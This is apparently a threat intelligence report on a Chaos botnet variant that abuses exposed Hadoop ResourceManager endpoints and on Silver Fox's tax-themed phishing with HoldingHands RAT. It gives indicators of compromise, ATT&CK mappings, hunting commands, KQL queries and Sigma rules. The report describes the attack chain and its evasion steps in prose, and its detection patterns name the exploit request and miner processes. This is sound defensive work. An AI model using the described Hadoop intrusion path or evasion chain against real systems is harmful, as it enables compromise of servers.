Chaos Botnet & Silver Fox: Two China-Nexus Campaigns Converging on Shared Infrastructure
Executive Summary
Between March and April 2026, Darktrace published findings on a new Chaos botnet variant actively targeting misconfigured cloud deployments — specifically Apache Hadoop clusters — rather than its traditional focus on routers and edge devices. The updated variant introduces SOCKS5 proxy functionality, enabling attackers to route malicious traffic through compromised servers and obscure the true origin of subsequent attacks.
Concurrently, the Silver Fox threat group (also tracked as UTG-Q-1000, Void Arachne) — previously concentrated on China and Taiwan — has expanded operations into Japan, Malaysia, and wider Southeast Asia using Winos 4.0 (ValleyRAT) and HoldingHands RAT (Gh0stBins). Tax-themed phishing remains the primary initial access vector.
A critical infrastructure overlap: the domain used to deliver the Chaos payload (pan.tenire[.]com) was previously attributed to Silver Fox's Operation Silk Lure phishing campaign (October 2025, documented by Seqrite Labs). Darktrace stops short of hard attribution, but this reuse is a meaningful signal indicating shared infrastructure within the Chinese cybercriminal ecosystem.
Organizations should act immediately if: they operate Hadoop, Spark, or any big data framework with administrative endpoints exposed to the internet — particularly ResourceManager on port 8088/tcp.
1. Background & Campaign Intersection
Chaos Botnet — Evolution History
First documented by Lumen Black Lotus Labs in September 2022, Chaos is a Go-based cross-platform malware supporting Windows, Linux, FreeBSD across ARM, Intel x86/x86-64, MIPS, and PowerPC architectures. It is assessed to be an evolution of Kaiji, a DDoS malware that previously targeted misconfigured Docker instances.
In its 2022 form, Chaos could execute up to 70 commands from a C2 server: remote shell, SSH brute-forcing for lateral movement, CVE exploitation, cryptocurrency mining, and DDoS over HTTP, TLS, TCP, UDP, and WebSocket.
Silver Fox — Threat Actor Profile
Silver Fox (SwimSnake, UTG-Q-1000, Void Arachne) is a Chinese-speaking threat group active since at least early 2024, operating a dual-track model combining espionage objectives with financially motivated campaigns. The group invests heavily in culturally-localized lures — impersonating tax authorities and finance ministries in each target country.
Silver Fox's toolkit revolves around Gh0st RAT derivatives: ValleyRAT/Winos 4.0 (primary modular backdoor), HoldingHands RAT/Gh0stBins (deployed alongside the primary payload), and more recently AtlasCross RAT (observed from March 2026). The group also leverages SEO poisoning to distribute malware via fake download sites impersonating Google Chrome, Telegram, WPS Office, and DeepSeek.
The Convergence Point: Infrastructure Overlap
The domain pan.tenire[.]com — used to host the Chaos agent in the March 2026 campaign — previously appeared in Silver Fox's Operation Silk Lure (Seqrite Labs, October 2025), distributing ValleyRAT via phishing. Darktrace does not assert hard attribution, and we maintain the same cautious stance. However, infrastructure reuse of this nature is operationally significant for defenders: tracking infrastructure is typically more reliable for attribution than tracking malware families, which can be completely rewritten.
2. Event Timeline
| Date | Event |
|---|---|
| September 2022 | Lumen Black Lotus Labs documents Chaos botnet — Go-based, cross-platform |
| March 2024 | Silver Fox begins using Excel lures targeting China to distribute Winos 4.0 |
| August 2025 | Fortinet documents Silver Fox SEO poisoning campaign distributing HiddenGh0st and Winos |
| October 2025 | Operation Silk Lure — Silver Fox phishing distributing ValleyRAT; pan.tenire[.]com first observed |
| October 2025 | Fortinet FortiGuard Labs publishes report on Silver Fox expansion to Japan/Malaysia via HoldingHands RAT |
| March 2026 | Darktrace CloudyPots honeypot captures new Chaos variant targeting Hadoop; pan.tenire[.]com reused |
| March 2026 | Silver Fox deploys AtlasCross RAT, extends targeting to Philippines, Thailand, Indonesia, Singapore, India |
| April 2026 | Darktrace and The Hacker News publish Chaos variant analysis |
3. Technical Analysis: Chaos Botnet 2026 Variant
3.1 Initial Access — Hadoop ResourceManager Exploitation
The attack observed by Darktrace begins with an HTTP POST request to the Apache Hadoop ResourceManager endpoint. The ResourceManager exposes port 8088/tcp and accepts new application submissions via REST API — a legitimate operational interface that becomes unauthenticated RCE when exposed to the internet without access controls.
Attack Vector: HTTP POST → Hadoop ResourceManager (port 8088)
Payload Type: Application creation embedding shell commands
The attacker creates a new "application" embedding a shell command sequence that:
- Downloads the Chaos agent binary from
pan.tenire[.]com chmod 777— grants execute permissions to all users- Executes the binary
- Deletes the binary from disk to minimize forensic trail
3.2 Binary Analysis — Changes from Prior Versions
The captured sample is a 64-bit ELF binary compiled for x86-64 Linux — a departure from earlier Chaos variants targeting ARM/MIPS/PowerPC on consumer routers. The internal namespace was restructured and multiple functions were rewritten or removed.
Removed capabilities:
- SSH brute-forcing spreader (lateral movement via SSH key cracking)
- Router CVE exploitation routines (inherited from Kaiji)
Retained capabilities:
- Persistence via
systemd - Keep-alive script stored on disk
- DDoS over HTTP, TLS, TCP, UDP, WebSocket
New capability: SOCKS5 Proxy
Trigger: C2 issues "StartProxy" command
Action: Malware opens listener on attacker-specified TCP port
Mode: SOCKS5 proxy — routes attacker traffic through victim host
Impact: Attacker's subsequent activity appears to originate from victim's IP
Replacing the SSH spreader and router exploits with a SOCKS5 proxy represents a deliberate monetization strategy shift. SSH brute-forcing generates high noise and accelerates blocklisting. A silent SOCKS5 proxy, by contrast, is a premium underground service: residential IP proxies (from real machines, not datacenter IPs) command higher prices precisely because they evade geo-blocking and IP-based blocklists far more effectively.
3.3 C2 & Infrastructure
Payload Delivery Domain: pan.tenire[.]com
Cross-reference: Operation Silk Lure (Silver Fox, Oct 2025) — ValleyRAT distribution
4. Technical Analysis: Silver Fox — Winos 4.0 & HoldingHands RAT
4.1 Phishing Entry — Ministry of Finance Lures
Infection begins with phishing emails containing PDFs impersonating official documents from the target country's Ministry of Finance. PDFs embed multiple malicious URLs, the majority pointing to Tencent Cloud storage. Fortinet confirmed that Tencent Cloud APPID values allowed analysts to link multiple phishing files back to the same operator.
One PDF posing as a Taiwanese tax regulation draft redirected victims to a Japanese-language page (twsww[.]xin/download[.]html) — where users were prompted to download a ZIP archive containing a HoldingHands RAT payload. This cross-lingual redirect is an indicator of deliberate multi-target infrastructure design.
4.2 Infection Chain — Malaysia Campaign
Stage 1: Executable posing as "excise audit document"
└─ Sideloads malicious DLL
Stage 2: Malicious DLL (dokan2.dll — impersonating Dokany file system driver)
└─ Shellcode loader for sw.dat
Stage 3: sw.dat executes:
├─ Anti-VM checks
├─ Process enumeration — checks for Avast, Norton, Kaspersky
├─ Terminate security processes if detected
├─ Privilege escalation (TrustedInstaller impersonation)
└─ Terminate Task Scheduler
Stage 4: Drops components into C:\Windows\System32\
├─ svchost.ini → contains RVA of VirtualAlloc function (evasion technique)
├─ TimeBrokerClient.dll
├─ msvchost.dat
└─ system.dat
Stage 5: HoldingHands RAT decrypted and injected into memory
└─ Establishes C2, sends host info, heartbeat every 60 seconds
4.3 HoldingHands RAT Capabilities
HoldingHands RAT (Gh0stBins) is a variant of Gh0st RAT — source code leaked in 2008 and widely adopted across Chinese hacking groups. Capabilities include:
- Arbitrary command execution
- File download and execution
- Exfiltration: screenshots, clipboard data, system metadata
- Dynamic C2 address updates via Windows Registry
- Persistence via Task Scheduler
- Security process termination and evasion
4.4 SEO Poisoning Vector
Parallel to phishing, Silver Fox operates a network of fake software download pages to distribute Winos 4.0. Impersonated software includes:
Google Chrome | Telegram | Youdao | Sogou AI | WPS Office | DeepSeek
This vector is particularly dangerous in enterprise environments where employees may install software directly without IT channel controls.
4.5 Campaign Linking — Infrastructure Correlation
Fortinet confirmed cross-campaign connections via:
Shared C2 IP: 156.251.17[.]9 (Taiwan and Japan campaigns)
PDB artifact: BackDoor.pdb
Domain reuse: twczb[.]com → resolves to same IP as Taiwan campaign → used in Malaysia
Tencent Cloud: Shared APPID links phishing files across geographic campaigns
5. IOCs & Artifacts
Chaos Botnet
# C2 / Payload Delivery
Domain: pan.tenire[.]com
# Binary characteristics
Type: 64-bit ELF (x86-64 Linux)
Feature: SOCKS5 proxy (StartProxy C2 command)
Persist: systemd service + on-disk keep-alive script
Silver Fox / HoldingHands RAT
# Network Indicators
IP: 156.251.17[.]9 [Shared C2 - Taiwan/Japan campaigns]
Domain: twsww[.]xin [HoldingHands delivery - Japanese lure]
Domain: twczb[.]com [Malaysia/Taiwan linking infrastructure]
Domain: bifa668[.]com [AtlasCross RAT C2, port 9899/tcp]
# Host-based Indicators
File: dokan2.dll [Shellcode loader - impersonates Dokany]
File: sw.dat [Second-stage payload]
File: svchost.ini [Contains RVA of VirtualAlloc - evasion]
File: TimeBrokerClient.dll [Dropped component]
File: msvchost.dat [Dropped component]
File: system.dat [Dropped component]
Path: C:\Windows\System32\ [Drop location for above files]
Debug: BackDoor.pdb [PDB path artifact in binary]
Registry: Dynamic C2 update [HoldingHands - C2 address stored in registry]
# Malware Families
ValleyRAT / Winos 4.0 → primary modular backdoor (Gh0st RAT lineage)
HoldingHands RAT → aka Gh0stBins, Gh0st RAT variant
AtlasCross RAT → newest addition (March 2026)
Note: Specific file hashes were not publicly released at time of writing. Monitor Fortinet FortiGuard Labs and Darktrace publications for updates.
6. MITRE ATT&CK Mapping
Chaos Botnet (2026 Variant)
| Tactic | Technique | ID | Description |
|---|---|---|---|
| Initial Access | Exploit Public-Facing Application | T1190 | Hadoop ResourceManager RCE exploitation |
| Execution | Command and Scripting Interpreter: Unix Shell | T1059.004 | Shell commands embedded in Hadoop application |
| Defense Evasion | Indicator Removal: File Deletion | T1070.004 | Binary deleted from disk post-execution |
| Persistence | Create or Modify System Process: Systemd Service | T1543.002 | Systemd-based persistence |
| Command and Control | Proxy: Multi-hop Proxy | T1090.003 | SOCKS5 proxy to mask attacker origin |
| Impact | Network Denial of Service | T1498 | DDoS capability (HTTP/TLS/TCP/UDP/WebSocket) |
| Impact | Resource Hijacking | T1496 | Cryptocurrency mining |
Silver Fox / HoldingHands RAT
| Tactic | Technique | ID | Description |
|---|---|---|---|
| Initial Access | Phishing: Spearphishing Attachment | T1566.001 | PDF lures impersonating Ministry of Finance |
| Initial Access | Drive-by Compromise | T1189 | SEO poisoning → fake software download sites |
| Execution | Shared Modules | T1129 | DLL sideloading (dokan2.dll) |
| Defense Evasion | Virtualization/Sandbox Evasion | T1497 | Anti-VM checks in sw.dat |
| Defense Evasion | Hijack Execution Flow: DLL Side-Loading | T1574.002 | Malicious DLL loaded by legitimate process |
| Defense Evasion | Masquerading | T1036 | Files impersonating svchost, TimeBrokerClient |
| Privilege Escalation | Abuse Elevation Control Mechanism | T1548 | TrustedInstaller impersonation |
| Discovery | Security Software Discovery | T1518.001 | Checks for Avast, Norton, Kaspersky processes |
| Discovery | Process Discovery | T1057 | Active process enumeration |
| Defense Evasion | Impair Defenses: Disable or Modify Tools | T1562.001 | Security process termination |
| Persistence | Scheduled Task/Job: Scheduled Task | T1053.005 | Task Scheduler abuse for persistence |
| Command and Control | Application Layer Protocol | T1071 | C2 over TCP, 60-second heartbeat |
| C2 | Dynamic Resolution | T1568 | C2 address updated via Windows Registry |
| Collection | Screen Capture | T1113 | Screenshot exfiltration |
| Collection | Clipboard Data | T1115 | Clipboard data exfiltration |
| Exfiltration | Exfiltration Over C2 Channel | T1041 | Data exfiltrated over established C2 |
7. Expert Assessment
7.1 Chaos Botnet: A Strategic Monetization Pivot
The removal of the SSH spreader and router CVE exploits — two defining Chaos capabilities — in favor of a SOCKS5 proxy is not a technical regression. It's a calculated business decision.
SSH brute-forcing generates high network noise and results in rapid blocklisting. Router CVE exploitation requires constant maintenance of an exploit list. A SOCKS5 proxy, by contrast, is operationally "silent" — pass-through traffic rarely triggers alerts in environments without deep network monitoring. In underground markets, residential proxy services (IPs sourced from real machines rather than datacenters) command premium pricing because they evade geo-blocking and IP reputation filters far more effectively than datacenter IPs.
The 2026 variant also signals a broader botnet strategy shift from "edge device compromise" to "cloud workload compromise." This is unsurprising: cloud adoption continues to accelerate, but security posture often fails to keep pace, especially for big data frameworks like Hadoop and Spark — designed for trusted internal networks but frequently exposed to the internet without authentication.
In our experience analyzing enterprise cloud environments, Hadoop administrative ports (8088, 9870, 16010) are commonly found exposed without firewall controls, particularly on clusters provisioned quickly for data analytics projects that bypassed formal security review.
7.2 Silver Fox: The Dual-Track Threat Model
Silver Fox exemplifies the increasingly blurred boundary between APT-style espionage and financially motivated cybercrime within the Chinese threat ecosystem. The infrastructure overlap with the Chaos campaign — while not definitively confirmed as intentional — hints at a shared "Criminal Service Provider" model where infrastructure is pooled across multiple operations.
The group's investment in culturally-localized lures is notable: a PDF impersonating Taiwanese tax regulations that redirects to a Japanese-language page reflects careful regional targeting. Given the confirmed expansion into Malaysia and wider Southeast Asia (Philippines, Thailand, Indonesia, Singapore, India), organizations in the region should anticipate Silver Fox deploying lures in local languages — Vietnamese, Bahasa Indonesia, Thai — following the same tax and financial authority impersonation pattern.
7.3 Infrastructure Overlap — Our Assessment
The pan.tenire[.]com overlap between Chaos (2026) and Silver Fox's Operation Silk Lure (2025) can be explained by: (1) the same threat actor operating both campaigns, (2) shared infrastructure purchased from a common Criminal Service Provider, or (3) coincidence (low probability given operational context). We align with Darktrace's appropriately cautious attribution stance. That said, infrastructure reuse tracking remains one of the most effective attribution techniques available to defenders — malware code can be fully rewritten, but domains and IPs are frequently reused for economic reasons.
8. Recommendations
Immediate (0–24h)
Cloud workload hardening:
# Check if Hadoop ResourceManager is internet-exposed
# From an external network, attempt:
curl http://<HADOOP_RESOURCEMANAGER_IP>:8088/ws/v1/cluster/info
# If response received → URGENT: apply firewall rules immediately
# Ports to block from internet: 8088, 9870, 8042, 16010, 19888
# Check for anomalous processes on Linux cloud hosts
ps aux | grep -E "(chaos|kaiji|miner|xmrig)"
systemctl list-units --type=service
# Find recently created systemd services
find /etc/systemd/system/ -newer /etc/passwd -name "*.service"
SIEM Detection (Microsoft Sentinel KQL):
// Detect potential Chaos SOCKS proxy behavior
// Unusual outbound TCP connections from Linux hosts
CommonSecurityLog
| where TimeGenerated > ago(24h)
| where DestinationPort !in (80, 443, 22, 53)
| where SourceIP in (internal_cloud_host_range) // update with actual IPs
| summarize ConnectionCount = count(), DestPorts = make_set(DestinationPort)
by SourceIP, DestinationIP, bin(TimeGenerated, 1h)
| where ConnectionCount > 100
| order by ConnectionCount desc
// Detect Hadoop ResourceManager POST exploitation
AzureDiagnostics
| where TimeGenerated > ago(24h)
| where Category == "ApplicationGatewayAccessLog"
| where requestUri_s contains "/ws/v1/cluster/apps"
and httpMethod_s == "POST"
| project TimeGenerated, clientIP_s, requestUri_s, httpStatus_d
Endpoint Detection (Silver Fox / HoldingHands):
// Detect sideloading artifacts
DeviceProcessEvents
| where FileName in~ ("dokan2.dll", "TimeBrokerClient.dll", "msvchost.dat")
or FolderPath contains @"C:\Windows\System32\svchost.ini"
| project Timestamp, DeviceName, InitiatingProcessFileName, FileName, FolderPath
// Detect TrustedInstaller impersonation
DeviceProcessEvents
| where TimeGenerated > ago(7d)
| where ProcessTokenElevation == "TokenElevationTypeFull"
and InitiatingProcessAccountName !in~ ("SYSTEM", "TrustedInstaller")
and FileName in~ ("svchost.exe", "services.exe")
| project TimeGenerated, DeviceName, AccountName, FileName, InitiatingProcessFileName
Short-term (1–7 Days)
Network segmentation:
- Audit all Hadoop/Spark/HDFS administrative service ports. Every administrative endpoint (ResourceManager, NameNode UI, History Server) must sit behind a VPN or be restricted to internal network access — never directly internet-exposed.
- Review cloud provider security group rules (AWS Security Groups, Azure NSG, GCP Firewall Rules) — prioritize rules with
0.0.0.0/0source on non-80/443 ports.
Threat hunting:
- Query DNS logs for IOC domains:
pan.tenire[.]com,twsww[.]xin,twczb[.]com. - Search for
svchost.ini,msvchost.dat,system.datinC:\Windows\System32\— these filenames do not exist in a clean Windows installation. - Review Task Scheduler entries created by processes other than SYSTEM or legitimate admin accounts.
User awareness:
- Brief staff on tax-themed PDF phishing lures, particularly if the organization has employees or business relationships in Japan, Malaysia, or Taiwan.
Long-term
Cloud security posture:
- Deploy a Cloud Security Posture Management (CSPM) solution to automatically detect misconfigurations — especially unnecessarily exposed services.
- For Hadoop clusters: enable Kerberos authentication and wire encryption. Hadoop Secure Mode is not optional for any production cluster with internet adjacency.
Detection engineering:
- Build detection coverage for "binary drop + execute + delete" patterns on Linux hosts — a common anti-forensics pattern that is frequently under-covered in SIEM deployments.
- Develop behavioral analytics for SOCKS proxy abuse: Linux hosts with anomalous outbound TCP connection counts, particularly when correlated with newly created systemd services.
Threat intelligence:
- Subscribe to feeds from Darktrace, Fortinet FortiGuard Labs, and Sekoia.io for updated IOCs on Silver Fox and Chaos botnet activity.
- Monitor MISP or equivalent OSINT TI platforms to track
pan.tenire[.]comand associated infrastructure.
9. Sigma Detection Rules
title: Chaos Botnet - Hadoop ResourceManager RCE Exploitation
id: [NEEDS VERIFICATION: Generate UUID]
status: experimental
description: Detects HTTP POST to Hadoop ResourceManager /ws/v1/cluster/apps
endpoint indicating potential Chaos botnet exploitation of misconfigured Hadoop
references:
- https://www.darktrace.com/blog/darktrace-identifies-new-chaos-malware-variant-exploiting-misconfigurations-in-the-cloud
logsource:
category: webserver
detection:
selection:
cs-method: POST
cs-uri-stem|contains: '/ws/v1/cluster/apps'
cs-uri-stem|contains: 'newApp'
condition: selection
falsepositives:
- Legitimate Hadoop job submission from authorized orchestration systems
level: high
tags:
- attack.initial_access
- attack.t1190
---
title: HoldingHands RAT - Suspicious File Artifacts in System32
id: [NEEDS VERIFICATION: Generate UUID]
status: experimental
description: Detects presence of files associated with HoldingHands RAT infection
chain. These filenames do not exist in a clean Windows installation.
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|contains:
- 'C:\Windows\System32\svchost.ini'
- 'C:\Windows\System32\msvchost.dat'
- 'C:\Windows\System32\system.dat'
- 'C:\Windows\System32\TimeBrokerClient.dll'
condition: selection
falsepositives:
- None expected
level: critical
tags:
- attack.defense_evasion
- attack.t1036
---
title: Potential SOCKS5 Proxy Listener - Botnet Activity
id: [NEEDS VERIFICATION: Generate UUID]
status: experimental
description: Detects processes opening unexpected TCP listeners on high ports,
potentially indicating SOCKS proxy functionality from Chaos-like malware
logsource:
product: linux
category: network_connection
detection:
selection:
Initiated: 'false'
DestinationPort|gte: 10000
DestinationPort|lte: 65535
filter_known:
Image|contains:
- '/usr/bin/python'
- '/usr/sbin/nginx'
- '/usr/sbin/apache2'
condition: selection and not filter_known
falsepositives:
- Legitimate high-port services; adjust filter_known per environment
level: medium
tags:
- attack.command_and_control
- attack.t1090.003
10. References
Darktrace — "Darktrace Identifies New Chaos Malware Variant Exploiting Misconfigurations in the Cloud" (April 2026)
https://www.darktrace.com/blog/darktrace-identifies-new-chaos-malware-variant-exploiting-misconfigurations-in-the-cloudThe Hacker News — "New Chaos Variant Targets Misconfigured Cloud Deployments, Adds SOCKS Proxy" (April 8, 2026)
https://thehackernews.com/2026/04/new-chaos-variant-targets-misconfigured.htmlThe Hacker News — "Researchers Warn of New Go-based Malware Targeting Windows and Linux Systems" (September 2022)
https://thehackernews.com/2022/09/researchers-warn-of-new-go-based.htmlFortinet FortiGuard Labs — "Silver Fox Expands Winos 4.0 Attacks to Japan and Malaysia via HoldingHands RAT" (October 2025)
https://thehackernews.com/2025/10/silver-fox-expands-winos-40-attacks-to.htmlSekoia.io — "Silver Fox: The Only Tax Audit Where the Fine Print Installs Malware" (March/April 2026)
https://blog.sekoia.io/silver-fox-the-only-tax-audit-where-the-fine-print-installs-malware/The Hacker News — "Silver Fox Expands Asia Cyber Campaign with AtlasCross RAT and Fake Domains" (March 2026)
https://thehackernews.com/2026/03/silver-fox-expands-asia-cyber-campaign.htmlHelp Net Security — "Chaos malware expands from routers to Linux cloud servers" (April 2026)
https://www.helpnetsecurity.com/2026/04/08/chaos-malware-cloud-misconfigured-servers/
